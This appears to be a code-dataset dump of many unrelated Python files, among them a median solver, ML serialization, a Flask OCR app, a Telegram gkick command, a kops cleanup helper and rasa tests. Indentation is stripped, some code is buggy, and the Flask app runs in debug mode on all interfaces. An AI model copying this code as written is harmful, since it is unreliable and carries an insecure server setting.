def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
nums1.extend(nums2);
nums1.sort();
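# Note: merging and sorting costs O((m+n) log(m+n)); meeting the follow-up's
# O(log(m+n)) bound would require a binary-search partition approach instead.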
# if we have an even number of elements
middle = len(nums1) // 2  # integer division so the result can be used as a list index
if len(nums1) % 2 == 0:
median = float(nums1[middle-1] + nums1[middle])/2.0
return median
else:
median = nums1[int(middle)]
return median
| 1,327 |
blocks/serialization.py | madisonmay/blocks | 0 | 2172719 |
import numpy
import logging
from blocks.bricks import Brick
from blocks.select import Selector
logger = logging.getLogger(__name__)
def save_params(bricks, path):
"""Save bricks parameters.
Saves parameters with their paths into an .npz file.
Parameters
----------
bricks : Brick or Selector
The bricks.
path : str or file
Destination for saving.
"""
if isinstance(bricks, Brick):
bricks = Selector([bricks])
assert isinstance(bricks, Selector)
params = bricks.get_params()
# numpy.savez is vulnerable to slashes in names
param_values = {name.replace("/", "-"): param.get_value()
for name, param in params.items()}
numpy.savez(path, **param_values)
def load_params(bricks, path):
"""Load brick parameters.
Loads parameters from an .npz file where they are saved with their paths.
Parameters
----------
bricks : Brick or Selector
The bricks.
path : str or file
Source for loading.
"""
if isinstance(bricks, Brick):
bricks = Selector([bricks])
assert isinstance(bricks, Selector)
param_values = {name.replace("-", "/"): value
for name, value in numpy.load(path).items()}
for name, value in param_values.items():
selected = bricks.select(name)
if len(selected) == 0:
logger.error("Unknown parameter {}".format(name))
assert len(selected) == 1
selected = selected[0]
assert selected.get_value(
borrow=True, return_internal_type=True).shape == value.shape
selected.set_value(value)
params = bricks.get_params()
for name in params.keys():
if name not in param_values:
logger.error("No value is provided for the parameter {}"
.format(name))
| 1,858 |
src/hyde/model/astronomic_radiation/lib_astrorad_core.py | c-hydro/hyde | 0 | 2173148 |
"""
Library Features:
Name: lib_astrorad_core
Author(s): <NAME> (<EMAIL>)
<NAME> (<EMAIL>)
Date: '20200215'
Version: '2.0.0'
"""
#######################################################################################
# Logging
import logging
import pandas as pd
import numpy as np
from src.common.default.lib_default_args import logger_name
# Logging
log_stream = logging.getLogger(logger_name)
# Debug
import matplotlib.pylab as plt
#######################################################################################
# --------------------------------------------------------------------------------
# Method to compute astronomic radiation by FAO algorithm
def execAstroRad_FAO(var_data_cf, geo_z,
time_period, time_delta,
geo_lz, geo_lm, geo_phi,
param_gsc, param_as, param_bs):
# Time information
seconds_delta = time_delta.seconds
time_delta_mid_t = time_delta.seconds / 3600 # in hour
minutes_input_step = time_delta.seconds / 60 # in minute?
# Cycle(s) on time steps
var_model_k_avg = np.zeros([time_period.__len__()])
var_model_ar_avg = np.zeros([time_period.__len__()])
var_model_k = np.zeros([geo_z.shape[0], geo_z.shape[1], time_period.__len__()])
var_model_ar = np.zeros([geo_z.shape[0], geo_z.shape[1], time_period.__len__()])
for time_id, time_step in enumerate(time_period):
# Compute cloud factor
var_data_cf_step = var_data_cf[:, :, time_id]
# Compute time information
time_delta_mid = time_delta / 2
time_mid = pd.Timestamp(time_step - time_delta_mid)
hour_mid = time_mid.hour
doy_mid = time_mid.dayofyear
# Inverse relative distance Earth-Sun
ird = 1.0 + 0.033 * np.cos(2 * np.pi / 365 * doy_mid)
b = 2 * np.pi * (doy_mid - 81) / 364.0
# Seasonal correction for solar time [h]
solar_corr = 0.1645 * np.sin(2 * b) - 0.1255 * np.cos(b) - 0.025 * np.sin(b)
# Solar declination [rad]
solar_decl = 0.4093 * np.sin(2 * np.pi / 365 * doy_mid - 1.405)
# Solar time angle at midpoint of hourly or shorter period [rad]
solar_time_angle = np.pi / 12.0 * (hour_mid + 0.06667 * (geo_lz - geo_lm) + solar_corr - 12.0)
# Solar time angle at beginning of period [rad]
solar_time_angle_start = solar_time_angle - np.pi * time_delta_mid_t / 24.0
# Solar time angle at end of period [rad]
solar_time_angle_end = solar_time_angle + np.pi * time_delta_mid_t / 24.0
# Extraterrestrial Radiation [MJ/m^2/interval] (<NAME>, 1980)
var_model_ar_step = (12 * minutes_input_step / np.pi * param_gsc * ird * (
(solar_time_angle_end - solar_time_angle_start) * np.sin(geo_phi) * np.sin(solar_decl) +
np.cos(geo_phi) * np.cos(solar_decl) * (np.sin(solar_time_angle_end) - np.sin(solar_time_angle_start))))
# Extraterrestrial Radiation [W/m^2] --> Incoming radiation
var_model_ar_step = var_model_ar_step * 10 ** 6 / seconds_delta
var_model_ar_step[var_model_ar_step <= 0.0] = 0.0
var_model_ar_step[np.isnan(var_data_cf_step)] = np.nan
# Clear-sky shortwave radiation
var_model_k_step = var_data_cf_step * (param_as + param_bs * geo_z) * var_model_ar_step
# Store K and AR results
var_model_k_avg[time_id] = np.nanmean(var_model_k_step)
var_model_ar_avg[time_id] = np.nanmean(var_model_ar_step)
var_model_k[:, :, time_id] = var_model_k_step
var_model_ar[:, :, time_id] = var_model_ar_step
# Return variable(s)
return var_model_ar, var_model_k
# --------------------------------------------------------------------------------
| 3,786 |
app.py | bryan-ab-smith/topocapture | 0 | 2172843 |
#!/usr/bin/python3
import easyocr
from flask import Flask, render_template, request
import requests
from werkzeug.utils import secure_filename
import os
app = Flask(__name__)
file_dir = 'static/uploads/'
final_odonyms = {}
def getData():
root_url = 'https://bryanabsmith.com/topomapper/datafiles/'
data_files = [
'atsi',
'business',
'etc',
'euexpl',
'local',
'monarchy',
'none',
'pol',
'religious',
'transplants',
'war'
]
odonyms = {}
for theme in data_files:
print(f'Adding {theme}...')
contents = requests.get(f'{root_url}{theme}.json')
to_parse = contents.json()
for odonym in to_parse['features']:
# print(to_parse['features']['properties']['name'])
odonyms[odonym['properties']['name']] = odonym['properties']['description'], odonym['properties']['refs']
print('Removing duplicates...')
for key, value in odonyms.items():
if value not in final_odonyms:
final_odonyms[key] = value
@app.route('/upload', methods=['GET', 'POST'])
def uploadPic():
'''
To-do:
1. Run EasyOCR on the picture
reader = easyocr.Reader(['en'], gpu=False)
result = reader.readtext(img)
for x in result:
print(x[1])
2. Look up info in the database/json file
3. Render template with info
'''
# Get the file info
upload = request.files.getlist('file')[0]
# Name and location of the file on the server
full_file_name = file_dir + secure_filename(upload.filename)
# Save the uploaded file so that it can be OCR'd
upload.save(full_file_name)
# Thanks to <NAME> for the EasyOCR lines (https://www.youtube.com/watch?v=ZVKaWPW9oQY)
reader = easyocr.Reader(['en'], gpu=False)
result = reader.readtext(full_file_name)
full_text = ''
for x in result:
full_text += ' ' + x[1]
print(full_text)
os.remove(full_file_name)
for odonym in final_odonyms:
#if full_text.split(' ')[0].lower().find(full_text) > 0:
if full_text.lower().find(odonym.split(' ')[0].lower()) > -1:
#if full_text.lower().find(odonym.split(' ')[0].lower() + ' ' + odonym.split(' ')[1][:1].lower()) > 0:
# return f'{odonym} St, named for {fake_names[odonym]}.'
return f'''<blockquote class="blockquote">
<h1 class="display-6" style="color: #0dcaf0;">{odonym}</h1>
<p class="mb-0">{final_odonyms[odonym][0]}</p>
<p></p>
<p><small>{final_odonyms[odonym][1]}</small></p>
</blockquote>'''
return 'Nothing found. Try again with a different picture.'
@app.route('/')
def index():
return render_template('index.html')
if __name__ == "__main__":
getData()
app.run(host='0.0.0.0', debug=True)
| 2,929 |
AlgoGenetic3.py | dargor/python-guess-random-color | 1 | 2172534 |
#
# Copyright (c) 2016, <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
from AlgoGenetic1 import AlgoGenetic1
from AlgoGenetic2 import AlgoGenetic2
class AlgoGenetic3(AlgoGenetic1, AlgoGenetic2):
OPS = AlgoGenetic1.OPS + AlgoGenetic2.OPS
def crossover(self, G1, G2, op):
if op in AlgoGenetic1.OPS:
return AlgoGenetic1.crossover(self, G1, G2, op)
elif op in AlgoGenetic2.OPS:
return AlgoGenetic2.crossover(self, G1, G2, op)
else:
raise ValueError('Unknown op')
| 1,224 |
specification/apps.py | Lance001Dy/AMP4OTC | 0 | 2172018 |
from django.apps import AppConfig
class SpecificationConfig(AppConfig):
name = 'specification'
| 101 |
gooddata-metadata-client/gooddata_metadata_client/apis/__init__.py | jaceksan/gooddata-python-sdk | 0 | 2172703 |
# flake8: noqa
# Import all APIs into this package.
# If you have many APIs here with many many models used in each API this may
# raise a `RecursionError`.
# In order to avoid this, import only the API that you directly need like:
#
# from .api.data_source_actions_controller_api import DataSourceActionsControllerApi
#
# or import this package, but before doing it, use:
#
# import sys
# sys.setrecursionlimit(n)
# Import APIs into API package:
from gooddata_metadata_client.api.data_source_actions_controller_api import DataSourceActionsControllerApi
from gooddata_metadata_client.api.data_source_entities_controller_api import DataSourceEntitiesControllerApi
from gooddata_metadata_client.api.data_source_layout_controller_api import DataSourceLayoutControllerApi
from gooddata_metadata_client.api.declarative_layout_controller_api import DeclarativeLayoutControllerApi
from gooddata_metadata_client.api.options_controller_api import OptionsControllerApi
from gooddata_metadata_client.api.organization_controller_api import OrganizationControllerApi
from gooddata_metadata_client.api.organization_model_controller_api import OrganizationModelControllerApi
from gooddata_metadata_client.api.organization_redirect_controller_api import OrganizationRedirectControllerApi
from gooddata_metadata_client.api.user_model_controller_api import UserModelControllerApi
from gooddata_metadata_client.api.workspace_object_controller_api import WorkspaceObjectControllerApi
| 1,473 |
setup.py | SidraELEzz/Sk-Checker | 5 | 2171671 |
import os , codecs
from setuptools import setup, find_packages
pkg = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(pkg, "README.md"), encoding="utf-8") as fh:
long_description = "\n" + fh.read()
setup(
name="SidraSk",
version="0.0.1",
author="SidraELEzz",
author_email="",
description = ("tools Checker Sk"),
long_description_content_type="text/markdown",
url="https://github.com/SidraELEzz/SidraSk",
project_urls={
"Bug Tracker": "https://github.com/pypa/sampleproject/issues",
},
long_description=long_description,
packages=find_packages(),
install_requires=['requests'],
keywords=['Checker-Sk'],
classifiers=[
"Development Status :: 1 - Planning",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Operating System :: Unix",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
]
)
| 1,106 |
lib/nuvoloso/nuvoloso/nuvoloso_helper.py | Nuvoloso/testing_open_source | 0 | 2171583 |
#!/usr/bin/python3
"""
Copyright 2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contains methods for convenience
"""
import logging
import subprocess
CHECK_OUTPUT_TIMEOUT = 3600
WAIT_TIMEOUT = 600
logger = logging.getLogger(__name__)
class NuvolosoHelper(object):
"""Contains methos that are often used in scripts"""
def __init__(self, args):
self.args = args
def run_check_output(self, cmd, stderr=subprocess.STDOUT, timeout=CHECK_OUTPUT_TIMEOUT,
encoding='UTF-8', shell=True):
"""Just runs a command and returns output"""
try:
logger.info("cmd: %s", cmd)
result = subprocess.check_output(cmd, stderr=stderr, timeout=timeout, encoding=encoding,
shell=shell)
if result:
result = result.strip()
logger.info(result)
return result
except subprocess.CalledProcessError as err:
logger.info("Failed to run cmd: %s, err: %s", cmd, err)
raise
def cleanup(self):
'''Cleanup'''
kops_del_cmd = "kops delete cluster --name " + self.args.kops_cluster_name + " --state " + \
self.args.kops_state_store + " --yes"
logging.info("Running cmd: %s", kops_del_cmd)
try:
# Delete kops cluster (containing app + clusterd)
result = subprocess.check_output(kops_del_cmd, stderr=subprocess.STDOUT,
timeout=CHECK_OUTPUT_TIMEOUT, encoding='UTF-8',
shell=True)
logging.info(result)
# TODO: remove the *sh and *yaml created by this test
except subprocess.CalledProcessError as err:
if err.output: logging.info(err.output)
raise
| 2,333 |
src/loadgenerator/data.py | Uoohasu/hipster-shop | 54 | 2172712 |
# Copyright 2021 Lightstep
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
products = [
'0PUK6V6EV0',
'1YMWWN1N4O',
'66VCHSJNUP',
'6E92ZMYYFZ',
'L9ECAV7KIM',
'LS4PSXUNUM',
'OLJCESPC7Z',
'3R92ZDDYKL',
'3R92ZMYYKL'
]
currencies = ["EUR", "USD", "JPY", "CAD", "TRY"]
good_cards = [{
"email": "<EMAIL>",
"street_address": "101 Green Street",
"zip_code": "94111",
"city": "San Francisco",
"state": "CA",
"country": "United States",
"credit_card_number": "4529-8148-3975-2894",
"credit_card_expiration_month": "7",
"credit_card_expiration_year": "2031",
"credit_card_cvv": "409",
}, {
"email": "<EMAIL>",
"street_address": "4400 Carillon Point, Floor 4",
"zip_code": "98033",
"city": "Kirkland",
"state": "WA",
"country": "United States",
"credit_card_number": "5379759871429836",
"credit_card_expiration_month": "1",
"credit_card_expiration_year": "2032",
"credit_card_cvv": "665",
}]
bad_cards = [{
"email": "<EMAIL>",
"street_address": "60 East 42nd Street, Suite 1230",
"zip_code": "10165",
"city": "New York",
"state": "NY",
"country": "United States",
"credit_card_number": "347572753801901",
"credit_card_expiration_month": "1",
"credit_card_expiration_year": "2026",
"credit_card_cvv": "528",
}]
def random_card(bad=False):
return random.choice(bad_cards if bad else good_cards)
def random_currency():
return random.choice(currencies)
def random_product():
return random.choice(products)
def random_quantity():
return random.choice([1, 2, 3, 4, 5, 10])
| 2,151 |
extractPatchlets.py | millxing/Patchlets | 7 | 2171913 |
#MIT License
#
#Copyright (c) 2019 <NAME>
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import re
import os
print('')
print("Current working directory is: " + os.getcwd())
print('')
print('')
print('Which .vcv file would you like to create patchlets from?')
fname = input("? ")
print("")
# Read contents of patch
f = open(fname + '.vcv')
A = []
for line in f:
A.append(line)
f.close()
original = A
# Extract the version of Rack (rackVersion)
temp = re.findall(r'\"(.+?)\"',A[1])
rackVersion = temp[1];
# Extract the module block (moduleBlock)
openBracket = -99
for i in range(0,len(A)):
if (A[i]== ' "modules": [\n'):
moduleBlockStart = i+1
openBracket = 1
else:
if ('[' in A[i]): openBracket = openBracket + 1
if (']' in A[i]): openBracket = openBracket - 1
if openBracket==0:
moduleBlockEnd = i
openBracket=99
moduleBlock = A[moduleBlockStart:moduleBlockEnd]
# Extract the cable block (cableBlock)
openBracket = -99
for i in range(moduleBlockEnd+1,len(A)):
if (A[i]== ' "cables": [\n'):
cableBlockStart = i+1
openBracket = 1
else:
if ('[' in A[i]): openBracket = openBracket + 1
if (']' in A[i]): openBracket = openBracket - 1
if openBracket==0:
cableBlockEnd = i
openBracket=99
cableBlock = A[cableBlockStart:cableBlockEnd]
# Create list of all the modules
modules = []; numModules = 0; openbracket = 0
for i in range(0,len(moduleBlock)):
if ('{' in moduleBlock[i]):
if openbracket==0: cc = []
openbracket = openbracket + 1
if openbracket>0:
cc.append(moduleBlock[i])
if ('}' in moduleBlock[i]): openbracket = openbracket - 1
if openbracket == 0:
numModules = numModules + 1
modules.append(cc)
# Create list of all the cables
cables = []; opencable = 0; numCables = 0
for i in range(0,len(cableBlock)):
if (cableBlock[i]== ' {\n'):
opencable = 1
cc = []
if opencable == 1:
cc.append(cableBlock[i])
if (' }' in cableBlock[i]):
opencable = 0
numCables = numCables + 1
cables.append(cc)
# Create list of all module IDs, module rows, module columns
col = []; row = []; rowrow = []; colrow = []; id = []
for i in range(0,numModules):
A = modules[i]
for j in range(0,len(A)):
if (A[j][:11] == ' "id":'):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
id.append(temp)
if A[j][:14] == ' "pos": [':
temp = re.findall(r'\d',A[j+1])
temp1 = int("".join(list(map(str,temp))))
temp = re.findall(r'\d',A[j+2])
temp2 = int("".join(list(map(str,temp))))
col.append(temp1)
row.append(temp2)
colrow.append(j+1)
rowrow.append(j+2)
# Create list of all cable inputs and outputs
outMod = []; inMod = []; outId = []; inId = []
for i in range(0,numCables):
A = cables[i]
for j in range(0,len(A)):
if (('outputModuleId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
outMod.append(temp)
if (('inputModuleId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
inMod.append(temp)
if (('outputId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
outId.append(temp)
if (('inputId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
inId.append(temp)
# Create patchlets
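# Each row of modules in the original patch becomes its own .vcv patchlet:
# the row is moved to y = 0, x-coordinates are rebased to the leftmost module,
# and only cables with both ends on that row are kept.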
for k in range(0,max(row)+1):
# Create the first 3 lines of a new patchlet ("{","version: #.#.#", "modules: ["})
new_file = original[0:3]
# Find leftmost x-coordinate in the row
mincol = 9999
for u in range(0,len(modules)):
if (row[u]==k):
if col[u]<mincol: mincol = col[u]
# Create new module block
# Change row to row 0
# Change x-coordinates so leftmost module is at 0
new_modules = []
for u in range(0,len(modules)):
if (row[u]==k):
modules[u][rowrow[u]] = " "+str(0)+"\n"
modules[u][colrow[u]] = " "+str(col[u]-mincol)+",\n"
new_modules.append(modules[u])
new_modules[-1][-1] = ' }\n'
new_cables = []
# Create new cable block
# Add cables to new cable block only if they only connect to modules on this row
for u in range(0,len(cables)):
inx = -99; outx = -99;
for j in range(0,len(modules)):
if inMod[u]==id[j]: inx = row[j];
if outMod[u]==id[j]: outx = row[j];
if inx==outx==k:
new_cables.append(cables[u])
if len(new_cables)>0:
new_cables[-1][-1] = ' }\n'
# Add module block to new patchlet
for u in range(0,len(new_modules)):
for j in range(0,len(new_modules[u])):
new_file.append(new_modules[u][j])
# Close module block with bracket and comma
new_file.append(' ],\n')
# Open cable block
new_file.append('"cables": [\n')
for u in range(0,len(new_cables)):
for j in range(0,len(new_cables[u])):
new_file.append(new_cables[u][j])
# Close cable block with bracket (no comma)
new_file.append(' ]\n')
# Close patch with brace
new_file.append('}\n')
# Save each new patchlet
plet_name = fname + "_" + str(k+1) + '.vcv'
f = open(plet_name,'w')
for j in range(0,len(new_file)):
f.write(new_file[j])
f.close()
print('Row ' + str(k+1) + " -> " + plet_name)
print('Extraction Completed')
| 7,843 |
run.py | HelloLily/slackbot | 0 | 2170886 |
import logging
import os
from slackbot.bot import Bot
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def main():
bot = Bot()
bot.run()
if __name__ == "__main__":
main()
| 218 |
Practicals/30_Multiplication_of_matrices.py | dev-bhargav/Python3-for-dummies | 0 | 2172620 |
#Matrix multiplication
import numpy.matlib
import numpy as np
print('Matrix multiply two matrices of 3×3 dimension')
print('enter elements for first matrix')
m1 = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
for x in range(0, 3):
for y in range(0, 3):
m1[x][y] = int(input())
mm1 = np.asmatrix(m1)
print('enter elements for second matrix')
m2 = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
for x in range(0, 3):
for y in range(0, 3):
m2[x][y] = int(input())
mm2 = np.asmatrix(m2)
print('This is first matrix')
print(mm1)
print('This is second matrix')
print(mm2)
mulm = mm1*mm2 # Multiplication of matrix
print('multiplication of matrices')
print(mulm)
| 660 |
Services/DataService/TorchDataService.py | carlCarlson6/NERwithBERT | 1 | 2170850 |
from torch.utils.data import DataLoader as TorchDataLoader
from torch.utils.data import TensorDataset, RandomSampler, SequentialSampler
import common
class TorchDataService:
def PutDataIntoTorch(self, inputs, masks, tags, batchSize):
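# Converts token ids, attention masks and tag ids to LongTensors, wraps them in a
# TensorDataset, and returns a DataLoader that shuffles via RandomSampler and drops
# the last incomplete batch.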
torchDataLoader = None
inputsTensor, masksTensor, tagsTensors = common.utils.TensorUtils.InputsIntoTensor(inputs=[inputs, masks, tags])
inputsLongTensor, masksLongTensor, tagsLongTensor = common.utils.TensorUtils.TensorsToLongTensors([inputsTensor, masksTensor, tagsTensors])
data = TensorDataset(inputsLongTensor, masksLongTensor, tagsLongTensor)
sampler = RandomSampler(data)
torchDataLoader = TorchDataLoader(data, sampler=sampler, batch_size=batchSize, drop_last=True)
return torchDataLoader
| 809 |
testModel.py | fightingzzy/DTLN_new | 0 | 2172404 |
# importing libs
import numpy as np
import tensorflow as tf
from keras.layers import Input, Dense, GaussianNoise
from keras.models import Model
from keras import regularizers
from keras.layers.normalization import BatchNormalization
from keras.optimizers import SGD
from keras.models import load_model
import librosa
data = np.load("data.npy")
# float objects have no to_bytes(); use the ndarray's raw byte representation instead (assumed intent)
binData = data.tobytes()
print(binData)
| 401 |
tg_bot/modules/global_kick.py | zinminlat/rose-upload-2 | 1 | 2173152 |
import html
from telegram import Message, Update, Bot, User, Chat, ParseMode
from typing import List, Optional
from telegram.error import BadRequest, TelegramError
from telegram.ext import run_async, CommandHandler, MessageHandler, Filters
from telegram.utils.helpers import mention_html
from tg_bot import dispatcher, OWNER_ID, SUDO_USERS, SUPPORT_USERS, STRICT_GBAN
from tg_bot.modules.helper_funcs.chat_status import user_admin, is_user_admin
from tg_bot.modules.helper_funcs.extraction import extract_user, extract_user_and_text
from tg_bot.modules.helper_funcs.filters import CustomFilters
from tg_bot.modules.helper_funcs.misc import send_to_list
from tg_bot.modules.sql.users_sql import get_all_chats
GKICK_ERRORS = {
"User is an administrator of the chat",
"Chat not found",
"Not enough rights to restrict/unrestrict chat member",
"User_not_participant",
"Peer_id_invalid",
"Group chat was deactivated",
"Need to be inviter of a user to kick it from a basic group",
"Chat_admin_required",
"Only the creator of a basic group can kick group administrators",
"Channel_private",
"Not in the chat",
"Method is available for supergroup and channel chats only",
"Reply message not found"
}
@run_async
def gkick(bot: Bot, update: Update, args: List[str]):
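# Global kick: remove the referenced user from every chat the bot knows about.
# (Telegram's unban_chat_member removes a present member without banning them.)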
message = update.effective_message
user_id = extract_user(message, args)
try:
user_chat = bot.get_chat(user_id)
except BadRequest as excp:
if excp.message in GKICK_ERRORS:
pass
else:
message.reply_text("User cannot be Globally kicked because: {}".format(excp.message))
return
except TelegramError:
pass
if not user_id:
message.reply_text("You do not seems to be referring to a user")
return
if int(user_id) in SUDO_USERS or int(user_id) in SUPPORT_USERS:
message.reply_text("OHHH! Someone's trying to gkick a sudo/support user! *Grabs popcorn*")
return
if int(user_id) == OWNER_ID:
message.reply_text("Wow! Someone's so noob that he want to gkick my owner! *Grabs Potato Chips*")
return
if int(user_id) == bot.id:
message.reply_text("OHH... Let me kick myself.. No way... ")
return
chats = get_all_chats()
message.reply_text("Globally kicking user @{}".format(user_chat.username))
for chat in chats:
try:
bot.unban_chat_member(chat.chat_id, user_id) # Unban_member = kick (and not ban)
except BadRequest as excp:
if excp.message in GKICK_ERRORS:
pass
else:
message.reply_text("User cannot be Globally kicked because: {}".format(excp.message))
return
except TelegramError:
pass
GKICK_HANDLER = CommandHandler("gkick", gkick, pass_args=True,
filters=CustomFilters.sudo_filter | CustomFilters.support_filter)
dispatcher.add_handler(GKICK_HANDLER)
| 3,025 |
alembic/versions/c6e62873fe8d_create_bars_table.py | Unit03/aio_web_sandbox | 0 | 2170151 |
"""Create bar table
Revision ID: c6e62873fe8d
Revises:
Create Date: 2016-03-19 20:54:39.612653
"""
# revision identifiers, used by Alembic.
revision = 'c6e62873fe8d'
down_revision = None
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
"bar",
sa.Column("id", sa.Integer, primary_key=True),
sa.Column("name", sa.String(50), nullable=False),
)
def downgrade():
op.drop_table("bar")
| 493 |
test/unit/graph_magic/test_graph_magic.py | Sam-Martin/graph-notebook | 378 | 2172209 |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import json
from IPython.testing.globalipapp import get_ipython
from graph_notebook.configuration.generate_config import Configuration
from test.unit.graph_magic.GraphNotebookTest import GraphNotebookTest
class TestGraphMagicLoadExt(GraphNotebookTest):
def test_load_graph_magic_succeeds(self):
res = self.ip.run_line_magic('lsmagic', '')
self.assertTrue('graph_notebook_config' in res.magics_manager.magics['line'])
def test_graph_notebook_config(self):
ip = get_ipython()
ip.magic('load_ext graph_notebook.magics')
res: Configuration = ip.run_line_magic('graph_notebook_config', '')
config_dict = res.to_dict()
self.assertEqual(self.config.to_dict(), res.to_dict())
config_dict['host'] = 'this-was-changed'
res2: Configuration = ip.run_cell_magic('graph_notebook_config', '', json.dumps(config_dict))
config_dict2 = res2.to_dict()
res3: Configuration = ip.run_line_magic('graph_notebook_config', '')
config_dict3 = res3.to_dict()
self.assertEqual(config_dict2, config_dict3)
| 1,210 |
tests/nlu/featurizers/test_featurizer.py
|
Tao2301230/rasa_learn
| 1 |
2171828
|
import numpy as np
import pytest
import scipy.sparse
from rasa.nlu.classifiers.diet_classifier import DIETClassifier
from rasa.nlu.featurizers.sparse_featurizer.count_vectors_featurizer import (
CountVectorsFeaturizer,
)
from rasa.nlu.featurizers.sparse_featurizer.lexical_syntactic_featurizer import (
LexicalSyntacticFeaturizer,
)
from rasa.nlu.tokenizers.whitespace_tokenizer import WhitespaceTokenizer
from rasa.nlu.training_data import Message, TrainingData
from rasa.nlu.featurizers.featurizer import DenseFeaturizer
from rasa.utils.features import Features
from rasa.nlu.constants import (
TEXT,
FEATURIZER_CLASS_ALIAS,
FEATURE_TYPE_SEQUENCE,
FEATURE_TYPE_SENTENCE,
)
from rasa.utils.tensorflow.constants import FEATURIZERS, SENTENCE, SEQUENCE, LABEL
def test_combine_with_existing_dense_features():
existing_features = Features(
np.array([[1, 0, 2, 3], [2, 0, 0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "test"
)
new_features = Features(
np.array([[1, 0], [0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin"
)
expected_features = np.array([[1, 0, 2, 3, 1, 0], [2, 0, 0, 1, 0, 1]])
existing_features.combine_with_features(new_features)
assert np.all(expected_features == existing_features.features)
def test_combine_with_existing_dense_features_shape_mismatch():
existing_features = Features(
np.array([[1, 0, 2, 3], [2, 0, 0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "test"
)
new_features = Features(np.array([[0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin")
with pytest.raises(ValueError):
existing_features.combine_with_features(new_features)
def test_combine_with_existing_sparse_features():
existing_features = Features(
scipy.sparse.csr_matrix([[1, 0, 2, 3], [2, 0, 0, 1]]),
FEATURE_TYPE_SEQUENCE,
TEXT,
"test",
)
new_features = Features(
scipy.sparse.csr_matrix([[1, 0], [0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin"
)
expected_features = [[1, 0, 2, 3, 1, 0], [2, 0, 0, 1, 0, 1]]
existing_features.combine_with_features(new_features)
actual_features = existing_features.features.toarray()
assert np.all(expected_features == actual_features)
def test_combine_with_existing_sparse_features_shape_mismatch():
existing_features = Features(
scipy.sparse.csr_matrix([[1, 0, 2, 3], [2, 0, 0, 1]]),
FEATURE_TYPE_SEQUENCE,
TEXT,
"test",
)
new_features = Features(
scipy.sparse.csr_matrix([[0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin"
)
with pytest.raises(ValueError):
existing_features.combine_with_features(new_features)
@pytest.mark.parametrize(
"pooling, features, expected",
[
(
"mean",
np.array([[0.5, 3, 0.4, 0.1], [0, 0, 0, 0], [0.5, 3, 0.4, 0.1]]),
np.array([[0.5, 3, 0.4, 0.1]]),
),
(
"max",
np.array([[1.0, 3.0, 0.0, 2.0], [4.0, 3.0, 1.0, 0.0]]),
np.array([[4.0, 3.0, 1.0, 2.0]]),
),
(
"max",
np.array([[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]),
np.array([[0.0, 0.0, 0.0, 0.0]]),
),
],
)
